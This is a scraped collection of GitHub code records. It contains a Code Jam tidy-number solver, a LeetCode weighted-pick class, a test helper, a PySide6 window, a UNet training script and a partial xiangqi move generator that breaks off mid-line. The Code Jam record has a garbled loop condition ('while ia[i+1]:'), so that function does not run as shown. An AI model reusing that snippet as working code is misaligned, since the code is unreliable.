+{"seq_id":"23563696871","text":"#-------------------------------------------------------------------------------\r\n# Name: module1\r\n# Purpose:\r\n#\r\n# Author: Tushar Sadana\r\n#\r\n# Created: 08-04-2017\r\n# Copyright: (c) Tushar Sadana 2017\r\n# Licence: \r\n#-------------------------------------------------------------------------------\r\n\r\ndef checktidy(a):\r\n flag=True\r\n i=0\r\n while ia[i+1]:\r\n flag = False\r\n break\r\n i+=1\r\n\r\n return flag\r\n\r\n\r\ndef largesttidy(n):\r\n\r\n m=int(n)\r\n for i in range(m,0,-1):\r\n a=[]\r\n while i>0:\r\n b=i%10\r\n a.insert(0,b)\r\n i=i/10\r\n\r\n if checktidy(a):\r\n for i in range(0,len(a)):\r\n a[i]=str(a[i])\r\n num=''\r\n for i in range(0,len(a)):\r\n num+=a[i]\r\n\r\n num=int(num)\r\n break\r\n return num\r\n\r\n\r\ndef main():\r\n pass\r\n\r\nif __name__ == '__main__':\r\n main()\r\n\r\ninput_file = open('b.in')\r\noutput_file = open('file.out', 'w')\r\ni=0\r\nt=int(input_file.readline())\r\nif t>=1 and t<=100:\r\n for line in input_file:\r\n\r\n answer = largesttidy(line)\r\n\r\n output_file.write(\"Case #{}: {} \".format(i+1, answer))\r\n output_file.write(\"\\n\")\r\n i+=1\r\ninput_file.close()\r\noutput_file.close()\r\n\r\n\r\n\r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_200/5146.py","file_name":"5146.py","file_ext":"py","file_size_in_byte":1343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"70451770756","text":"\"\"\"\n528. Random Pick with Weight\n\"\"\"\n\nfrom typing import List\nfrom random import random\n\nclass Solution:\n\n def __init__(self, w: List[int]):\n self.pre_sum = []\n self.total = 0\n for val in w:\n self.total += val\n self.pre_sum.append(self.total)\n\n def pickIndex(self) -> int:\n pick = self.total * random()\n\n lo, hi = 0, len(self.pre_sum)-1\n while lo < hi:\n md = lo + (hi - lo) // 2\n if pick <= self.pre_sum[md]:\n hi = md\n else:\n lo = md+1\n\n return lo\n","repo_name":"dictator-x/practise_as","sub_path":"algorithm/leetCode/0528_random_pick_with_weight.py","file_name":"0528_random_pick_with_weight.py","file_ext":"py","file_size_in_byte":588,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"10009461933","text":"import pprint\nimport numpy as np\nfrom yggdrasil.metaschema.datatypes import get_type_class\n\n\ndef get_test_data(typename):\n r\"\"\"Determine a test data set for the specified type.\n\n Args:\n typename (str): Name of datatype.\n\n Returns:\n object: Example of specified datatype.\n\n \"\"\"\n typeclass = get_type_class(typename)\n return typeclass.get_test_data()\n\n\ndef check_received_data(typename, x_recv):\n r\"\"\"Check that the received message is equivalent to the\n test data for the specified type.\n\n Args:\n typename (str): Name of datatype.\n x_recv (object): Received object.\n\n Raises:\n AssertionError: If the received message is not equivalent\n to the received message.\n\n \"\"\"\n x_sent = get_test_data(typename)\n print('RECEIVED:')\n pprint.pprint(x_recv)\n print('EXPECTED:')\n pprint.pprint(x_sent)\n if isinstance(x_sent, np.ndarray):\n np.testing.assert_array_equal(x_recv, x_sent)\n else:\n assert(x_recv == x_sent)\n","repo_name":"chrishavlin/yggdrasil","sub_path":"tests/examples/types/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1016,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"61"} +{"seq_id":"26739623788","text":"import sys\nfrom PySide6 import QtCore, QtGui, QtWidgets\nfrom handbook import Handbook\nfrom measument_device_app import MeasureDevice\nfrom settings import SettingsTab\n\nclass MainWindow(QtWidgets.QWidget):\n def __init__(self):\n super().__init__()\n\n self.setWindowTitle(\"Measure device from LAMMI\")\n\n self.label2 = QtWidgets.QLabel(\"Tab 2\")\n self.label3 = QtWidgets.QLabel(\"Tab 3\")\n\n self.layout = QtWidgets.QVBoxLayout()\n self.setLayout(self.layout)\n\n self.tabWigdet = QtWidgets.QTabWidget()\n\n # Constructing the Handbook tab\n # The set up of the file can be found in\n # handbook.py file\n handbook_constructor = Handbook(self.tabWigdet)\n handbook_constructor.construction()\n\n # Constructing the measure tab\n # The set up of the file can be found in\n # measument_device_app file\n measure_constructor = MeasureDevice(self.tabWigdet)\n measure_constructor.construction()\n\n # Other Stuff\n settings = SettingsTab(self.tabWigdet)\n settings.construction()\n\n self.layout.addWidget(self.tabWigdet)\n\nif __name__ == '__main__':\n app = QtWidgets.QApplication(sys.argv)\n screen = MainWindow()\n screen.resize(800, 600)\n screen.show()\n\n sys.exit(app.exec_())\n","repo_name":"pieromorais/measure_device","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1306,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17625091473","text":"import torch, time, datetime, tqdm, os, cv2\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nfrom torch.autograd import Variable\r\nfrom PIL import Image\r\nimport numpy as np\r\n\r\nfrom model import UNet\r\nfrom sklearn.metrics import confusion_matrix\r\n\r\ndef get_data(mode):\r\n x, y = [], []\r\n for i in tqdm.tqdm(os.listdir('data/{}/images'.format(mode))):\r\n img = cv2.imread('data/{}/images/{}'.format(mode, i))\r\n mask = np.array(Image.open('data/{}/1st_manual/{}.gif'.format(mode, i.split('.')[0])))\r\n\r\n mask[mask != 0] = 1\r\n\r\n img = cv2.resize(img, (256, 256))\r\n mask = cv2.resize(mask, (256, 256), interpolation=cv2.INTER_NEAREST)\r\n\r\n x.append(img)\r\n y.append(mask)\r\n\r\n x, y = np.array(x, dtype=np.float) / 255.0, np.array(y)\r\n x = np.transpose(x, axes=[0, 3, 1, 2])\r\n\r\n print('success load {} set'.format(mode))\r\n return x, y\r\n\r\n\r\ndef metrice(y_true, y_pred):\r\n y_true, y_pred = y_true.to('cpu').detach().numpy(), np.argmax(y_pred.to('cpu').detach().numpy(), axis=1)\r\n y_true, y_pred = y_true.reshape((-1)), y_pred.reshape((-1))\r\n cm = confusion_matrix(y_true, y_pred, labels=[0, 1])\r\n\r\n pa = np.diag(cm).sum() / (cm.sum() + 1e-7)\r\n\r\n mpa_arr = np.diag(cm) / (cm.sum(axis=1) + 1e-7)\r\n mpa = np.nanmean(mpa_arr)\r\n\r\n MIoU = np.diag(cm) / (np.sum(cm, axis=1) + np.sum(cm, axis=0) - np.diag(cm) + 1e-7)\r\n MIoU = np.nanmean(MIoU)\r\n\r\n return pa, mpa, MIoU\r\n\r\n\r\nif __name__ == '__main__':\r\n BATCH_SIZE = 8\r\n\r\n DEVICE = torch.device(\"cuda\" if torch.cuda.is_available() else \"cpu\")\r\n print(DEVICE)\r\n\r\n Name = 'UNet'\r\n model = UNet()\r\n print(sum(p.numel() for p in model.parameters()))\r\n\r\n x_train, y_train = get_data('train')\r\n x_val, y_val = get_data('test')\r\n\r\n train_dataset = torch.utils.data.TensorDataset(torch.from_numpy(x_train), torch.from_numpy(y_train))\r\n train_iter = torch.utils.data.DataLoader(train_dataset, BATCH_SIZE, shuffle=True)\r\n\r\n val_dataset = torch.utils.data.TensorDataset(torch.from_numpy(x_val), torch.from_numpy(y_val))\r\n val_iter = torch.utils.data.DataLoader(val_dataset, BATCH_SIZE, shuffle=True)\r\n\r\n optimizer = torch.optim.Adam(params=model.parameters(), lr=0.0001, weight_decay=0.001)\r\n loss = nn.CrossEntropyLoss().to(DEVICE)\r\n\r\n with open('{}.log'.format(Name), 'w+') as f:\r\n f.write('epoch,train_loss,test_loss,train_pa,test_pa,train_mpa,test_mpa,train_miou,test_miou')\r\n best_miou = 0\r\n print('{} begin train!'.format(datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S')))\r\n for epoch in range(100):\r\n model.to(DEVICE)\r\n model.train()\r\n train_loss = 0\r\n begin = time.time()\r\n num = 0\r\n train_pa, train_mpa, train_miou = 0, 0, 0\r\n for x, y in train_iter:\r\n x, y = x.to(DEVICE), y.to(DEVICE).long()\r\n pred = model(x.float())\r\n l = loss(pred, y)\r\n optimizer.zero_grad()\r\n l.backward()\r\n optimizer.step()\r\n\r\n train_loss += float(l.data)\r\n train_pa_, train_mpa_, train_miou_ = metrice(y, pred)\r\n train_pa += train_pa_\r\n train_mpa += train_mpa_\r\n train_miou += train_miou_\r\n num += 1\r\n train_loss /= num\r\n train_pa, train_mpa, train_miou = train_pa / num, train_mpa / num, train_miou / num\r\n\r\n num = 0\r\n test_loss = 0\r\n model.eval()\r\n test_pa, test_mpa, test_miou = 0, 0, 0\r\n with torch.no_grad():\r\n for x, y in val_iter:\r\n x, y = x.to(DEVICE), y.to(DEVICE).long()\r\n\r\n pred = model(x.float())\r\n l = loss(pred, y)\r\n num += 1\r\n test_loss += float(l.data)\r\n\r\n test_pa_, test_mpa_, test_miou_ = metrice(y, pred)\r\n test_pa += test_pa_\r\n test_mpa += test_mpa_\r\n test_miou += test_miou_\r\n\r\n test_loss /= num\r\n test_pa, test_mpa, test_miou = test_pa / num, test_mpa / num, test_miou / num\r\n\r\n if test_miou > best_miou:\r\n best_miou = test_miou\r\n model.to('cpu')\r\n torch.save(model, '{}.pkl'.format(Name))\r\n print(\r\n '{} epoch:{}, time:{:.2f}s, train_loss:{:.4f}, val_loss:{:.4f}, train_pa:{:.4f}, val_pa:{:.4f}, train_mpa:{:.4f}, test_mpa:{:.4f}, train_miou:{:.4f}, test_miou:{:.4f}'.format(\r\n datetime.datetime.now().strftime('%Y-%m-%d %H:%M:%S'),\r\n epoch + 1, time.time() - begin, train_loss, test_loss,\r\n train_pa, test_pa, train_mpa, test_mpa, train_miou, test_miou\r\n ))\r\n with open('{}.log'.format(Name), 'a+') as f:\r\n f.write('\\n{},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f},{:.4f}'.format(\r\n epoch, train_loss, test_loss, train_pa, test_pa, train_mpa, test_mpa, train_miou, test_miou\r\n ))\r\n","repo_name":"zexuanli-sc202zl/MSc-project","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4925,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"16824541971","text":"\"\"\"\n中国象棋环境\n主要功能:\n1. 获取当前可行动作\n2. step\n3. 判断游戏是否结束\n4. 将 statestr 转换成 plane\n\"\"\"\nimport copy\n\nimport numpy as np\nfrom enum import IntEnum\nfrom env.cchess_env_c import CchessEnvC\n\n\nFULL_INIT_FEN = 'rnbakabnr/9/1c5c1/p1p1p1p1p/9/9/P1P1P1P1P/1C5C1/9/RNBAKABNR w - - 0 1'\ny_axis = '9876543210'\nx_axis = 'abcdefghi'\n\n\nclass ChessSide(IntEnum):\n RED = 0\n BLACK = 1\n\n @staticmethod\n def next_side(side):\n return {ChessSide.RED: ChessSide.BLACK, ChessSide.BLACK: ChessSide.RED}[side]\n\n\nclass Pos(object):\n def __init__(self, x, y):\n self.x = x\n self.y = y\n\n def abs_diff(self, other):\n return abs(self.x - other.x), abs(self.y - other.y)\n\n def middle(self, other):\n return Pos((self.x + other.x) / 2, (self.y + other.y) / 2)\n\n def __str__(self):\n return str(self.x) + \":\" + str(self.y)\n\n def __eq__(self, other):\n return (self.x == other.x) and (self.y == other.y)\n\n def __ne__(self, other):\n return (self.x != other.x) or (self.y != other.y)\n\n def __call__(self):\n return self.x, self.y\n\n\nclass BaseChessBoard(object):\n def __init__(self, fen=None):\n self._board = None\n self.move_side = None\n self.clear()\n self.round = 0\n if fen:\n self.from_fen(fen)\n\n def clear(self):\n self._board = [[None for x in range(9)] for y in range(10)]\n self.move_side = ChessSide.RED\n\n def copy(self):\n return copy.deepcopy(self)\n\n def put_fench(self, fench, pos):\n if self._board[pos.y][pos.x] is not None:\n return False\n\n self._board[pos.y][pos.x] = fench\n\n return True\n\n @staticmethod\n def judge_side(fen_ch):\n return ChessSide.BLACK if fen_ch.islower() else ChessSide.RED\n\n def is_valid_move(self, pos_from, pos_to):\n \"\"\"\n 只进行最基本的走子规则检查,不对每个子的规则进行检查,以加快文件加载之类的速度\n \"\"\"\n if not (0 <= pos_to.x <= 8):\n return False\n if not (0 <= pos_to.y <= 9):\n return False\n\n fench_from = self._board[pos_from.y][pos_from.x]\n if not fench_from:\n return False\n\n from_side = self.judge_side(fench_from)\n\n # move_side 不是None值才会进行走子颜色检查,这样处理某些特殊的存储格式时会处理比较迅速\n if self.move_side and (from_side != self.move_side):\n return False\n\n fench_to = self._board[pos_to.y][pos_to.x]\n if not fench_to:\n return True\n\n to_side = self.judge_side(fench_to)\n\n return from_side != to_side\n\n def _move_piece(self, pos_from, pos_to):\n\n fench = self._board[pos_from.y][pos_from.x]\n self._board[pos_to.y][pos_to.x] = fench\n self._board[pos_from.y][pos_from.x] = None\n\n return fench\n\n def move(self, pos_from, pos_to):\n pos_from.y = 9 - pos_from.y\n pos_to.y = 9 - pos_to.y\n if not self.is_valid_move(pos_from, pos_to):\n return None\n\n self._move_piece(pos_from, pos_to)\n\n return 'step_success'\n\n def from_fen(self, fen):\n\n num_set = {'1', '2', '3', '4', '5', '6', '7', '8', '9'}\n ch_set = {'k', 'a', 'b', 'n', 'r', 'c', 'p'}\n\n self.clear()\n\n if not fen or fen == '':\n return\n\n fen = fen.strip()\n\n x = 0\n y = 9\n\n for i in range(0, len(fen)):\n ch = fen[i]\n\n if ch == ' ':\n break\n elif ch == '/':\n y -= 1\n x = 0\n if y < 0:\n break\n elif ch in num_set:\n x += int(ch)\n if x > 8:\n x = 8\n elif ch.lower() in ch_set:\n if x <= 8:\n self.put_fench(ch, Pos(x, y))\n x += 1\n else:\n return False\n\n fens = fen.split()\n\n self.move_side = None\n if (len(fens) >= 2) and (fens[1] == 'b'):\n self.move_side = ChessSide.BLACK\n else:\n self.move_side = ChessSide.RED\n\n if len(fens) >= 6:\n self.round = int(fens[5])\n else:\n self.round = 1\n\n return True\n\n def get_board_arr(self):\n return np.asarray(self._board[::-1])\n\n\ndef create_uci_labels():\n \"\"\"创建所有合法走子UCI,size 2086\"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n advisor_labels = ['d7e8', 'e8d7', 'e8f9', 'f9e8', 'd0e1', 'e1d0', 'e1f2', 'f2e1',\n 'd2e1', 'e1d2', 'e1f0', 'f0e1', 'd9e8', 'e8d9', 'e8f7', 'f7e8']\n bishop_labels = ['a2c4', 'c4a2', 'c0e2', 'e2c0', 'e2g4', 'g4e2', 'g0i2', 'i2g0',\n 'a7c9', 'c9a7', 'c5e7', 'e7c5', 'e7g9', 'g9e7', 'g5i7', 'i7g5',\n 'a2c0', 'c0a2', 'c4e2', 'e2c4', 'e2g0', 'g0e2', 'g4i2', 'i2g4',\n 'a7c5', 'c5a7', 'c9e7', 'e7c9', 'e7g5', 'g5e7', 'g9i7', 'i7g9']\n\n for l1 in range(9):\n for n1 in range(10):\n destinations = [(t, n1) for t in range(9)] + \\\n [(l1, t) for t in range(10)] + \\\n [(l1 + a, n1 + b) for (a, b) in\n [(-2, -1), (-1, -2), (-2, 1), (1, -2), (2, -1), (-1, 2), (2, 1), (1, 2)]] # 马走日\n for (l2, n2) in destinations:\n if (l1, n1) != (l2, n2) and l2 in range(9) and n2 in range(10):\n move = letters[l1] + numbers[n1] + letters[l2] + numbers[n2]\n labels_array.append(move)\n\n for p in advisor_labels:\n labels_array.append(p)\n\n for p in bishop_labels:\n labels_array.append(p)\n\n return labels_array\n\n\ndef create_position_labels():\n \"\"\"\n ['a0', 'a1', 'a2', 'a3', 'a4', 'a5', 'a6', 'a7', 'a8', 'a9',\n 'b0', 'b1', 'b2', 'b3', 'b4', 'b5', 'b6', 'b7', 'b8', 'b9',\n 'c0', 'c1', 'c2', 'c3', 'c4', 'c5', 'c6', 'c7', 'c8', 'c9',\n 'd0', 'd1', 'd2', 'd3', 'd4', 'd5', 'd6', 'd7', 'd8', 'd9',\n 'e0', 'e1', 'e2', 'e3', 'e4', 'e5', 'e6', 'e7', 'e8', 'e9',\n 'f0', 'f1', 'f2', 'f3', 'f4', 'f5', 'f6', 'f7', 'f8', 'f9',\n 'g0', 'g1', 'g2', 'g3', 'g4', 'g5', 'g6', 'g7', 'g8', 'g9',\n 'h0', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'h7', 'h8', 'h9',\n 'i0', 'i1', 'i2', 'i3', 'i4', 'i5', 'i6', 'i7', 'i8', 'i9']\n \"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n letters.reverse()\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n for l1 in range(9):\n for n1 in range(10):\n move = letters[8 - l1] + numbers[n1]\n labels_array.append(move)\n return labels_array\n\n\ndef create_position_labels_reverse():\n \"\"\"\n ['a9', 'a8', 'a7', 'a6', 'a5', 'a4', 'a3', 'a2', 'a1', 'a0',\n 'b9', 'b8', 'b7', 'b6', 'b5', 'b4', 'b3', 'b2', 'b1', 'b0',\n 'c9', 'c8', 'c7', 'c6', 'c5', 'c4', 'c3', 'c2', 'c1', 'c0',\n 'd9', 'd8', 'd7', 'd6', 'd5', 'd4', 'd3', 'd2', 'd1', 'd0',\n 'e9', 'e8', 'e7', 'e6', 'e5', 'e4', 'e3', 'e2', 'e1', 'e0',\n 'f9', 'f8', 'f7', 'f6', 'f5', 'f4', 'f3', 'f2', 'f1', 'f0',\n 'g9', 'g8', 'g7', 'g6', 'g5', 'g4', 'g3', 'g2', 'g1', 'g0',\n 'h9', 'h8', 'h7', 'h6', 'h5', 'h4', 'h3', 'h2', 'h1', 'h0',\n 'i9', 'i8', 'i7', 'i6', 'i5', 'i4', 'i3', 'i2', 'i1', 'i0']\n \"\"\"\n labels_array = []\n letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i']\n letters.reverse()\n numbers = ['0', '1', '2', '3', '4', '5', '6', '7', '8', '9']\n\n for l1 in range(9):\n for n1 in range(10):\n move = letters[l1] + numbers[n1]\n labels_array.append(move)\n labels_array.reverse()\n return labels_array\n\n\nclass CchessEnv(object):\n \"\"\"\n board_pos_name\n [['a0' 'b0' 'c0' 'd0' 'e0' 'f0' 'g0' 'h0' 'i0']\n ['a1' 'b1' 'c1' 'd1' 'e1' 'f1' 'g1' 'h1' 'i1']\n ['a2' 'b2' 'c2' 'd2' 'e2' 'f2' 'g2' 'h2' 'i2']\n ['a3' 'b3' 'c3' 'd3' 'e3' 'f3' 'g3' 'h3' 'i3']\n ['a4' 'b4' 'c4' 'd4' 'e4' 'f4' 'g4' 'h4' 'i4']\n ['a5' 'b5' 'c5' 'd5' 'e5' 'f5' 'g5' 'h5' 'i5']\n ['a6' 'b6' 'c6' 'd6' 'e6' 'f6' 'g6' 'h6' 'i6']\n ['a7' 'b7' 'c7' 'd7' 'e7' 'f7' 'g7' 'h7' 'i7']\n ['a8' 'b8' 'c8' 'd8' 'e8' 'f8' 'g8' 'h8' 'i8']\n ['a9' 'b9' 'c9' 'd9' 'e9' 'f9' 'g9' 'h9' 'i9']]\n \"\"\"\n board_pos_name = np.array(create_position_labels()).reshape(9, 10).transpose()\n Ny = 10\n Nx = 9\n\n def __init__(self):\n self.name = 'a chess env'\n\n @staticmethod\n def expand_num(single_line):\n single_line = single_line.replace(\"2\", \"11\")\n single_line = single_line.replace(\"3\", \"111\")\n single_line = single_line.replace(\"4\", \"1111\")\n single_line = single_line.replace(\"5\", \"11111\")\n single_line = single_line.replace(\"6\", \"111111\")\n single_line = single_line.replace(\"7\", \"1111111\")\n single_line = single_line.replace(\"8\", \"11111111\")\n single_line = single_line.replace(\"9\", \"111111111\")\n return single_line\n\n @staticmethod\n def compress_num(single_line):\n single_line = single_line.replace(\"111111111\", \"9\")\n single_line = single_line.replace(\"11111111\", \"8\")\n single_line = single_line.replace(\"1111111\", \"7\")\n single_line = single_line.replace(\"111111\", \"6\")\n single_line = single_line.replace(\"11111\", \"5\")\n single_line = single_line.replace(\"1111\", \"4\")\n single_line = single_line.replace(\"111\", \"3\")\n single_line = single_line.replace(\"11\", \"2\")\n return single_line\n\n @staticmethod\n def sim_do_action(in_action, in_state):\n x_trans = {'a': 0, 'b': 1, 'c': 2, 'd': 3, 'e': 4, 'f': 5, 'g': 6, 'h': 7, 'i': 8}\n\n src = in_action[0:2]\n dst = in_action[2:4]\n\n src_x = int(x_trans[src[0]])\n src_y = int(src[1])\n\n dst_x = int(x_trans[dst[0]])\n dst_y = int(dst[1])\n\n # change two line or one line\n board = in_state.split('/')\n if src_y != dst_y:\n board_src_y = board[src_y]\n board_dst_y = board[dst_y]\n board_src_y = list(CchessEnv.expand_num(board_src_y))\n board_dst_y = list(CchessEnv.expand_num(board_dst_y))\n board_dst_y[dst_x] = board_src_y[src_x]\n board_src_y[src_x] = '1'\n board[src_y] = CchessEnv.compress_num(''.join(board_src_y))\n board[dst_y] = CchessEnv.compress_num(''.join(board_dst_y))\n else:\n board_line = board[src_y]\n board_line = list(CchessEnv.expand_num(board_line))\n board_line[dst_x] = board_line[src_x]\n board_line[src_x] = '1'\n board[src_y] = CchessEnv.compress_num(''.join(board_line))\n board = \"/\".join(board)\n return board\n\n @staticmethod\n def replace_num(board):\n board = CchessEnv.expand_num(board)\n return board.split(\"/\")\n\n @staticmethod\n def check_bounds(to_y, to_x):\n if to_y < 0 or to_x < 0:\n return False\n\n if to_y >= CchessEnv.Ny or to_x >= CchessEnv.Nx:\n return False\n\n return True\n\n @staticmethod\n def validate_move(c, upper=True):\n if c.isalpha():\n if upper is True:\n if c.islower():\n return True\n else:\n return False\n else:\n if c.isupper():\n return True\n else:\n return False\n else:\n return True\n\n @staticmethod\n def get_king_pos(state_str):\n ys_label = '9876543210'[::-1]\n xs_label = 'abcdefghi'\n board_king = state_str.replace(\"1\", \" \")\n board_king = board_king.replace(\"2\", \" \")\n board_king = board_king.replace(\"3\", \" \")\n board_king = board_king.replace(\"4\", \" \")\n board_king = board_king.replace(\"5\", \" \")\n board_king = board_king.replace(\"6\", \" \")\n board_king = board_king.replace(\"7\", \" \")\n board_king = board_king.replace(\"8\", \" \")\n board_king = board_king.replace(\"9\", \" \")\n board_king = board_king.split('/')\n\n k_big, k = '', ''\n for i in range(3):\n pos = board_king[i].find('K')\n if pos != -1:\n k_big = \"{}{}\".format(xs_label[pos], ys_label[i])\n break\n for i in range(-1, -4, -1):\n pos = board_king[i].find('k')\n if pos != -1:\n k = \"{}{}\".format(xs_label[pos], ys_label[i])\n break\n return k_big, k\n\n @staticmethod\n def is_check_catch(state_str, next_player):\n \"\"\"\n :param state_str: String, input FEN state str\n :param next_player: String, 'w' or 'b'\n :return : Boolean, 下一步对手是否可以将军\n \"\"\"\n moveset = CchessEnv.get_legal_moves(state_str, next_player)\n targetset = set([i[-2:] for i in moveset])\n\n wk, bk = CchessEnv.get_king_pos(state_str)\n targetkingdic = {'b': wk, 'w': bk}\n targ_king = targetkingdic[next_player]\n # TODO add long catch logic\n if targ_king in targetset:\n return True\n else:\n return False\n\n @staticmethod\n def game_end(state_str, current_player):\n \"\"\"\n :param state_str: String, input FEN state str\n :param current_player: String, 'w' or 'b'\n\n :return : (Boolean, String), 游戏是否结束, 胜者\n \"\"\"\n # TODO add long catch\n if state_str.find('k') == -1:\n return True, 'w'\n elif state_str.find('K') == -1:\n return True, 'b'\n wk, bk = CchessEnv.get_king_pos(state_str)\n target_king_dic = {'b': wk, 'w': bk}\n move_set = CchessEnv.get_legal_moves(state_str, current_player)\n dst_point = [i[-2:] for i in move_set]\n\n targetset = set(dst_point)\n\n targ_king = target_king_dic[current_player]\n if targ_king in targetset:\n return True, current_player\n return False, None\n\n @staticmethod\n def get_legal_moves(state, current_player):\n \"\"\"\n :param state: string, input FEN state str\n :param current_player: string, 'w' or 'b' current player\n\n : return legal moves: List\n \"\"\"\n\n moves = []\n k_x = None\n k_y = None\n\n K_x = None\n K_y = None\n\n face_to_face = False\n\n board_positions = np.array(CchessEnv.replace_num(state))\n for y in range(board_positions.shape[0]):\n for x in range(len(board_positions[y])):\n if board_positions[y][x].isalpha():\n # 黑车\n if board_positions[y][x] == 'r' and current_player == 'b':\n # 左右\n to_y = y\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 上下\n to_x = x\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].isupper():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 红车\n elif board_positions[y][x] == 'R' and current_player == 'w':\n to_y = y\n for to_x in range(x - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_x in range(x + 1, CchessEnv.Nx):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n to_x = x\n for to_y in range(y - 1, -1, -1):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n for to_y in range(y + 1, CchessEnv.Ny):\n m = CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x]\n if board_positions[to_y][to_x].isalpha():\n if board_positions[to_y][to_x].islower():\n moves.append(m)\n break\n\n moves.append(m)\n\n # 马\n elif (board_positions[y][x] == 'n' or board_positions[y][x] == 'h') and current_player == 'b':\n for i in range(-1, 3, 2):\n for j in range(-1, 3, 2):\n to_y = y + 2 * i\n to_x = x + 1 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n board_positions[to_y - i][x].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n to_y = y + 1 * i\n to_x = x + 2 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n board_positions[y][to_x - j].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif (board_positions[y][x] == 'N' or board_positions[y][x] == 'H') and current_player == 'w':\n for i in range(-1, 3, 2):\n for j in range(-1, 3, 2):\n to_y = y + 2 * i\n to_x = x + 1 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n board_positions[to_y - i][x].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n to_y = y + 1 * i\n to_x = x + 2 * j\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n board_positions[y][to_x - j].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n # 象\n elif (board_positions[y][x] == 'b' or board_positions[y][x] == 'e') and current_player == 'b':\n for i in range(-2, 3, 4):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 5 and board_positions[y + i // 2][x + i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=False) and \\\n to_y >= 5 and board_positions[y + i // 2][x - i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n elif (board_positions[y][x] == 'B' or board_positions[y][x] == 'E') and current_player == 'w':\n for i in range(-2, 3, 4):\n to_y = y + i\n to_x = x + i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 4 and board_positions[y + i // 2][x + i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + CchessEnv.board_pos_name[to_y][to_x])\n\n to_y = y + i\n to_x = x - i\n if CchessEnv.check_bounds(to_y, to_x) and \\\n CchessEnv.validate_move(board_positions[to_y][to_x], upper=True) and \\\n to_y <= 4 and board_positions[y + i // 2][x - i // 2].isalpha() is False:\n moves.append(CchessEnv.board_pos_name[y][x] + 